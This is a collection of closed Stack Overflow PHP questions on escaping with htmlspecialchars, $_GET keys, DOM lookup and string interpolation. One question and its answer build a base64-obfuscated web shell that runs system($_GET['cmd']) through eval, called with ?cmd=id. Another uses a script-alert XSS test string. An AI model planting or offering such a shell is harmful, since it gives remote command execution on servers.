Closed. This question is not reproducible or was caused by typos. It is not currently accepting answers.
This question was caused by a typo or a problem that can no longer be reproduced. While similar questions may be on-topic here, this one was resolved in a way less likely to help future readers.
Closed 9 years ago.
Improve this question
I have a very simple php script designed to test the function htmlspecialchars:
$question="<script>alert('hacked')</script>";
echo "<br>original question=",$question;
$question = make_secure( $question );
echo "<br>converted question=",$question;
echo "<br>converted question calling htmlspecialchars=",htmlspecialchars($question);
function make_secure($data) {
$data = htmlspecialchars($data); return $data; }
It should remove the special chars from the original string $question by calling a function with htmlspecialchars inside it. However, the function does not seem remove the special chars. They are only removed if I call htmlspecialchars explicitly in the script. Why?
Thanks.
EDIT: This is what I see when I run the script:
original question=
converted question=<script>alert('hacked')</script>
converted question calling htmlspecialchars=<script>alert('hacked')</script>
(the 'hacked' script is also executed first). To rephrase my question, why is the script still perfectly visible in $question on line line converted question= ? i.e. why hasn't the variable been converted? I thought that after the variable had been converted, the script should no longer be visible.
The output visible to the user should be:
(nothing, script executed)
<script>alert('hacked')</script>
<script>alert('hacked')</script>
The actual output, visible to the browser is:
<script>alert('hacked')</script>
<script>alert('hacked')</script>
<script>alert('hacked')</script>
Which is exactly correct. The first line is unescaped, the HTML and script get interpreted. The second line is escaped once, displaying the text as is to the user. The third line is escaped twice, displaying the text as escaped once to the user.
You keep escaping the same variable over and over, so the result is going to change depending on how often you escape it. Maybe start here: The Great Escapism (Or: What You Need To Know To Work With Text Within Text)
Related
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 6 years ago.
Improve this question
I'm trying to Test script
I want to run system function inside base64 decode function
But it doesn't work any idea !
<?php base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSkg")
?>
localhost/test.php?cmd=id
PHP's base64_decode function gets a string (which is encoded in base64) and decode it back to the original data. The function then returns the decoded data as string, which means your code actually looks like:
<?php "system($_GET['cmd']) "
?>
(Running this code makes no sense).
If you want to PHP to "run" (or Evaluate) the string that you juse decoded - you should use the php's eval language construct:
<?php eval("system($_GET['cmd']);");
?>
Note the ; added in the end of the string (inside the eval call).
Very important
Note that the use of eval is very dangerous because it allows execution of arbitrary code.
You should really NOT use it unless you REALLY know what you are doing.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
Closed 7 years ago.
Edit the question to include desired behavior, a specific problem or error, and the shortest code necessary to reproduce the problem. This will help others answer the question.
This question was caused by a typo or a problem that can no longer be reproduced. While similar questions may be on-topic here, this one was resolved in a way less likely to help future readers.
Improve this question
I have the form input like this. But it is showing
Notice: Array to string conversion in C:\xampp\htdocs\testpage\index.php on line 95
<form class='signupform' action='<?php echo htmlspecialchars('".$_SERVER."'['PHP_SELF']);?'> method='post'>
I have seen many posts around here, but could not solve it.
From your code:
<?php echo htmlspecialchars('".$_SERVER."'['PHP_SELF']);?'>
What you are doing is:
htmlspecialchars(subject)
but subject is made up of a jumble of string and variable references, so to start with the Array ($_SERVER) contains the element(s) you want to work on, which are denoted by the key in the square brackets (['PHP_SELF']). But what you have is a concatination . and a couple of quotes inbetween the two so what you are doing is
htmlspecialchars(array + quote + string )
which is clearly and obviously invalid.
So to fix it, you remove the excess quote marks and remove the concatenations between the array and it's key indicator.
htmlspecialchars('".$_SERVER['PHP_SELF'])
This is better but still not there yet, you now have to tidy up the other quotes as because your function doesn't contain any string (it's just the array variable you're working on here), you do not need any quotes in your code:
htmlspecialchars($_SERVER['PHP_SELF'])
So to wrap up a long post about a very small issue, you would correct with this replacement to your original code:
action='<?php echo htmlspecialchars($_SERVER['PHP_SELF']);?>'>
It is also worth noting that PHP_SELF can be easily abused and should not be used in this context, better to use another similar process such as $_SERVER['SCRIPT_NAME']
You must keep track of your open quotes and try and avoid mixing quotes. You should also keep track of properly closing your PHP code with ?> as your original code you forgot the > so the HTML was being interpreted as PHP by the server.
Use
<form class="signupform" action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']);?>" method="post">
or
<form class="signupform" action="" method="post">
Closed. This question is not reproducible or was caused by typos. It is not currently accepting answers.
This question was caused by a typo or a problem that can no longer be reproduced. While similar questions may be on-topic here, this one was resolved in a way less likely to help future readers.
Closed 8 years ago.
Improve this question
I think this is simple question , I am having trouble in passing a variable with a . in the name for example
www.example.com/index.php?auth.start=facebook
if I change this url to
www.example.com/index.php?authstart=facebook
and I try to get the variable like this
$var = $_GET[authstart];
echo $var;
It works fine , But
$var = $_GET[auth.start];
echo $var;
this shows no value in $var can any one help me out with this
thanks in Advance
try with $_GET["auth_start"]
Hope that helps :)
A . in a variable name is not valid in PHP, so with $_GET PHP will convert the . to a _. It does this because register_globals will extract the $_GET array into individual PHP variables which can't contain the ..
Doing print_r($_GET) will show you this.
User defined arrays work fine: $a['x.y'] = 1 etc...
Array keys are strings. While php may forgive you sometimes for omitting them, they should be enclosed. so always do
$_GET['yourkey'];
and never
$_GET[yourkey];
in your case, this is the correct syntax:
$var = $_GET['auth.start'];
But then, as #AbraCadaver says, that will also not work, for you . is changed to a _.
So use
$var = $_GET['auth_start'];
To go a bit deeper: if you don't actually make it a string, you'll get this notice:
PHP Notice: Use of undefined constant yourkey - assumed 'yourkey'
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about programming within the scope defined in the help center.
Closed 9 years ago.
Improve this question
I'm using PHP to retrieve a document and find some data within the HTML.
I've used Tidy clean and repair as the document contains lots of bad html.
Anyway,
In the html document there is a tag like:
Link 12345
I want to get the value of the attribute (www.google.com) if the text content (Link 12345) matches a certain string.
$h2 = $doc->getElementsByTagName('a');
for ($i2; $i2 < $h2->length; $i2++) {
$attr2 = $h2->item($i2)->getAttribute('href');
if ($h2->item($i2)->textContent == "Link 12345")
print "FOUND";
}
which doesn't seem to work. I know that the for loop returns 'Link 12345' at some point (when ->textContent is called). But the comparison always fails even though Link 12345 appears if it is printed out. I suspect there is some issue with the encoding but I can't get it fixed.
Thanks.
You can use PHP's DOMXPath to execute an XPath query against your DOM object.
I believe that for yours it'll be
//a[text()="Link 12345"]
Will return all the who's text is "Link 12345".
A simple bug: you are testing "$h2->item($i2)->textContent" instead of "$h2->textContent"
Isn't it?
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
Closed 9 years ago.
Questions asking for code must demonstrate a minimal understanding of the problem being solved. Include attempted solutions, why they didn't work, and the expected results. See also: Stack Overflow question checklist
Questions concerning problems with code you've written must describe the specific problem — and include valid code to reproduce it — in the question itself. See SSCCE.org for guidance.
Improve this question
How would one use the mysql/php $list['key'] inside a php echo i.e
echo "<p> My Text . $list[''] . </p>";
Thanks In Advance
It is as simple as that:
echo "<p> My Text $list[index] </p>";
N. b.: you do not use single quotes (') for the index as you usually would, like in $a=$list['index'];, since the whole thing is already enclosed in double quotes (").
Correction:
Just found out, with indices like 'a b' you still do need the quotes! (Thanks, Jon!)
Edit: (response to comment)
That is a competely different thing! Use
list($var1,$var2) = mysql_fetch_assoc($result);
instead. The list()-construct (is it a function?!?) extracts the values out of the assigned array (in your case the result of your mysql_fetch_assoc()-function). Assuming, that your result set returns values for two columns (otherwise you will have to supply more variables in list()). And then place the variables into your text like
echo "<p> My Text $var1 and somewhere maybe also $var2 ... </p>";
Still, since you are using mysql_fetch_assoc($result) you could do
$z=mysql_fetch_assoc($result);
echo "<p> My Text $z[field1] and somewhere maybe also $z[field2] ... </p>";
with field1 and field2 being the actual column names from your MySQL table.
It is customary on this site now, to also warn you of the dangers of still using the deprecated mysql_*functions. You should change to the more secure and modern versions of mysqli_*...
In this context, usually you would just write the bare array key between the angle brackets:
echo "$array[key]";
However, if key is the empty string or if it contains any of a class of characters that have special meaning in this context then you can't do this. For example, these will not work:
echo "$array[]"; // empty string key
echo "$array[]]"; // string key: "]"
In this case you can add {} around the variable and use single quotes as if you were not inside a double quoted string context. For example:
echo "{$array['']}";
echo "{$array[']']}";
This is called complex string variable parsing; see the manual for more information.